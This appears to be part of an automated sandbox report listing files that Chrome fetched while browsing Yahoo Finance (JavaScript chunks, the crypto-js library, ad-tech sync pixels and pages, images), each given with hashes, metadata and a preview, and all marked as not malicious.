                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:189B8ED64093B12937354B2EF71CCF1DF59690D90432241A10FE1CB25000ACBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A561D48D340192C05E37C089CEE1BB3FE00553FCC055C478C86A7C43C41A6C2CF740E07F678D09025D8B72E2D7E26D9F4E17A20BA2F0B24D559928DAAB61AD94
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:TRC.getRTUS({"status":"Unknown","userid":""});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.162628750394423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:DEMYCIbB4pEx9PgdbToC7MQ+iIo2EBOCoSMgaQME/eYNPLy3zRhH2Qv/H+hf2COW:gMbIbB4pEx9Pg17MQ+iIo2EBOCoSMgaG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2FF8039AAC72DA3FC83FBA1B284BAA45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:040E20D71BDCA7AB88AA543178770C55020ED33B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF4698D774243337F18C174D8551304E8618ECCE825AADB7E9671BDD56EC5A50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D11081C236AB2C31CFE286BA293E0586EECE7B3ED6872EBAE74C56DC0E40FE7DE24F9D000C04EE19F516F0E273AFE8645325400ECABA68429513732EF8ADFC9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.822274649514338
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:Hb/xzbQh3r6bg83S4CMkQLGBmTYt9gi/WnfbeD:Hbhe2S3bDmTWmfbQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EE61AEBD014886187BC3D03ECBA32EC0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C9BCBA5561D00C2CD8A21444048EF7138AC0074E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A26D51DF0CB195E53A3F28C222FC877B75CEE84C5B8B78AA66EAAFC734A8F562
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:284B060A636DD21BF4CF2D58F361B539DAA57B95012C3846C59A601A432F770D1BD2DB65A513D40BF144A4A96F089E42993716CC6E57281DC7CEE88CC760FFF3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/context.Bt1NApa8.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{r,D as o}from"./scheduler.Dsuh-FKt.js";import{w as s}from"./43.BgWy8GOF.js";function a(t){return{setContext(e){return r(t,e)},getContext(){return o(t)}}}function x(t){const e=a(t);return{...e,setContext(n){return e.setContext(s(n))}}}const i=x("ad-constraint");export{i as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (760)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):761
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274907688803793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:qVeh4dheUghAgtzE4NAtnIZESKxSEoFYEsstzkRWtTazMfjIDo4djfccaPIfqLNg:uJdheUnlXsEtxSRs5RWtXaO9QwNAkqsO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:67B313B9207E745856532D2A09C1BEE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:570782E4CFCB4B51249BCE008D640EBED1733451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:62B5FF2D52A6E4895F6E31265456B202B1DA395ED7B9C5447FDC0FDCCA89A651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3151595D518FA66C808CE1B1D0AE3E98C78EA69052F4641BDBBB22C2A5684D049AF1E5DE9BEE500BB35F7F1B778A51D3F790E1DE2E3C56CB13214BBD0885BE28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadRecentlyViewedTickers.BzfDOI0S.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{f as o,l as d}from"./logUtil.CCV3qKPL.js";import{c as f}from"./commonUtil.BWwawKjd.js";import{l as y}from"./loadQuote.BOFhtUlf.js";async function m(r,{count:l=15,silent:n=!1,reuse:s=!1}){const[i]=await f(["recentlyViewedTickers"],r),t=i.getRecentlyViewedTickers();if(s&&(t!=null&&t.length))return t;try{const a=await o(r,{isRelative:!0,pathname:"/xhr/recently-viewed-tickers",perfLabel:"loadRecentlyViewedTickers",query:{}}),e=(a==null?void 0:a.slice(0,l))||[];if(e&&e.length>0)try{await y(r,{fields:["longName","regularMarketPrice","regularMarketChange","regularMarketChangePercent","shortName","priceHint"],symbols:e})}catch{}return n||i.updateRecentlyViewedTickers(e),e}catch(c){d(r,{},{data:c,perfLabel:"loadRecentlyViewedTickers"})}}export{m as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):47992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.605846858683577
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (22620)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):22714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.196553176556425
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:hiG1zqSzJhyaBUym9Loi1VZlBkXhKUrq1rGjTWSLy6MSSEx4T:hd1z1Vm988TBgEUr1fydSSbT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C175EE9FAB72D6270687013FB29D3E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D39DB0037D778ACE8DC2F4DB6DCD2D65D9DD6320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2720399CCB28F8EEC7BE00DF36A3AA69CF789CEB5E771448B4C7CD0AFC46E451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E4F56D86196147689D2115D05478B5B1AEFA29D1ABB6430D738AFBA919C5067BC272CF64777AED483B39AD4BA14148BC7974BC84D0C5D6FED1F135AE99EB9F06
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-17a0a1b3.37df374c080303b4b67a.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[6477],{7083:(e,t,a)=>{var r=a(4603);(e=>{var t=void 0!==r.mE?r.mE:e.CIQ;function a(){}t.ChartEngine||(t.ChartEngine=function(){}),a.fetchInitialData=function(e,t,a,r,i){},a.fetchUpdateData=function(e,t,a,r){},a.fetchPaginationData=function(e,t,a,r,i){},a.subscribe=function(e){},a.unsubscribe=function(e){},t.QuoteFeed=t.QuoteFeed||function(){},t.QuoteFeed.prototype.fetch=function(e,t){this.v2QuoteFeed||console.log("You must implement CIQ.QuoteFeed.[yourfeedname].prototype.fetch()")},t.QuoteFeed.prototype.announceError=function(e,a){e.suppressErrors||a.suppressAlert||e.startDate||e.endDate||a.error&&t.alert("Error fetching quote:"+a.error)},t.QuoteFeed.prototype.multiFetch=function(e,t){return 0===e.length&&t([]),e[0].stx.driver.multiFetch(e,t)},t.QuoteFeed.Subscriptions=function(){this.subscrip
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3425)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3426
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.393523784110459
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:/465ejpKWdmxd95ersyPsWw9XK7DkKNtI:/4654xmxd95er7Pl7DNtI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DC83766246839D189E60E58BB9F97371
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:76430CACDC91E9C68A8227ABF76A527357B5D5F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B152412815ED6623E0EF20B5AC7BA1B5AACB669DC89EFE1D5827440DC41154C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A5B6CE57FBFC61DCBFB6164935089D1A0567025F9B3DA70EAA58FA2C1F1261C642D81D2B6B5631DFDE9F4C033A788D3C1A6F60FD3FB484AEDC138BF1A866F243
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as j,p as h,k,i as d,c as T,A as q,b as C,j as F,u as w,g as z,a as N,t as I,h as O,m as R}from"./scheduler.Dsuh-FKt.js";import{S as W,i as v,g as B,a as m,e as D,t as c,c as V,b as E,m as p,d as A}from"./index.CvwOawEI.js";import{g as G,a as H}from"./spread.CgU5AtxT.js";import{A as L}from"./arrow_forward.8N8VOjY3.js";import{L as S}from"./Link.vSNQugO0.js";import{t as J}from"./commonUtil.BWwawKjd.js";function K(a){let l,t,i;const s=a[9].default,n=T(s,a,a[10],null),r=[{className:a[4]},{href:a[0]},{"aria-label":a[6]},{size:a[8][a[5]]},{i13nModel:a[1]},{title:a[6]},{variant:"subtle"},{icon:L},{"data-testid":a[2]},a[3]?{"data-sveltekit-reload":""}:{}];let u={$$slots:{default:[Q]},$$scope:{ctx:a}};for(let e=0;e<r.length;e+=1)u=q(u,r[e]);return t=new S({props:u}),{c(){n&&n.c(),l=C(),V(t.$$.fragment)},l(e){n&&n.l(e),l=F(e),E(t.$$.fragment,e)},m(e,o){n&&n.m(e,o),k(e,l,o),p(t,e,o),i=!0},p(e,o){n&&n.p&&(!i||o&1024)&&w(n,s,e,e[10],i?N(s,e[10],o,null):z(e[10]),null);const _=o&383?G(r,[o&1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://mwzeom.zeotap.com/mw?zpartnerid=1384&env=mWeb&gdpr=0&gdpr_consent=&cid=176682A8-E121-44A7-818D-4FE53D542BB2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 600 x 400, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):309382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.998616289152378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:3F25IHGxUkOcaBzWtyyKGaXI6KdyJRPKlwnAuyWAgvBB23:c5ImBOFz87hwI72A9dgvP6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:558354A890D9D46D30D76B9B1510AE5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:82A88673B1FD0FEB7768FE6C04515012145AC8A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09E13695493287F2BDAE4C003A75F5C2266D821D50C93D02003066DA5CB60C06
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DF42F1F0BA66AAFA58A47C3DEDD58DA836439A87106A0B668936219B2C6B49B7FB36C94CEFC0BC85B457105CDB8038377EE5135826B4187D6FFF93C90E14AE74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...X..........W......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a47b1bdf-5d4a-5941-a465-9a200835b13a" xmpMM:DocumentID="xmp.did:C40BF620290C11E692B6DFB3F2923E1A" xmpMM:InstanceID="xmp.iid:C40BF61F290C11E692B6DFB3F2923E1A" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f7a3807c-438f-da49-8d9d-824321111911" stRef:documentID="xmp.did:a47b1bdf-5d4a-5941-a465-9a200835b13a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx..}..%U.....^.89...3...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://eus.rubiconproject.com/usync.html?gdpr=0&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "720-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 166614
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):53253
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.99559995701065
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:n4JP9pNjyWXMBoNeIYfh1gduX7kwOBSSmWEZ+NDzC2FGeCIpOdJD+/qLRYJwGzGt:4Hp15uo01jKeCaWRu2fCEM6cJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:72A68C06CDE2FF9F1C8F1174BC98F491
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3216A6DFF67AF6B815A57B69963FC3C9524768BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D961F571A3D29C3A679D5D5B39E5E544F5EA38D32AB0E898679E9763F386B115
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:985FF77D51BC90D1AAE19D1D4449143D41FC7B0DE03E6050411EA07FE54E28A2351FA775207D5E689DA5631C6140A73F93ADAA3C6F942F61B8230BA267570D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..720-bundle.js..;ko.:...W...#5.b.I....vR_...(..<....L.jd.CQqR[.}.!..-......hj."...E..U..+..(.X..V..XP............I.O#.~K...g...+.e.......f.M.4.?....m..2\.F4..9...Gl6.....dn.F....}..lF$......".R....W.o,....}.|.|.%.noYr..i.,.~.Q.v7s..T.....o..;....h.6s..R..e.[...6.?JXl.J...i|.}..\.R1.j.0..D...Uk......ga$...&S.[.X..}.*....an..I.,s.~8.....N...j.P?N...m.KX%.6....T.1.`.......'L__..7..D:..r......S...........a......^.).1..p..M..5R.Q....._...zY..8.0.=^.._.{@T.c..Qw\......4L...Y...8P....y.M..Dj^H.=.y.>..8.......%.H1........$....r..O..N. \.......$ 4i..%.Q=.....a...M7L..~...PJ.A......[...a....*.........C... E..`T......g.4.r....>.t.d....i...,tPk..c.........P[.V10H.W...W "..pvy.....7.Y.I:.DJ.......`CV.I3[Q-...*p3.M..e.cK*...i...2"._...n..7..0...\..i:eS.5.*....E.........I.rdZ.......>........Z.U,........5.]...?0c.....#A..>.8.....3P...E%;~!SypA..E......);y.....X.>.l.(..%.._..S*g;....d._986"J..W.......4....g.8!.E.......L.(..3..6A.......E.Cz....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.176789192964165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUVAae/XExlHrfx/n:8aOUJ/n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:56398E76BE6355AD5999B262208A17C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A1FDEE122B95748D81CEE426D717C05B5174FE96
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2F561B02A49376E3679ACD5975E3790ABDFF09ECBADFA1E1858C7BA26E3FFCEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FD8B021F0236E487BFEE13BF8F0AE98760ABC492F7CA3023E292631979E135CB4CCB0C89B6234971B060AD72C0CA4474CBB5092C6C7A3255D81A54A36277B486
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://sync.crwdcntrl.net/qmap?c=240&tp=PUBM&tpid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=&ct=y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a...................!.......,...........T..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.yieldmo.com/v000/sync?extinit=0&userid=7992184014990425658&pn_id=an
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
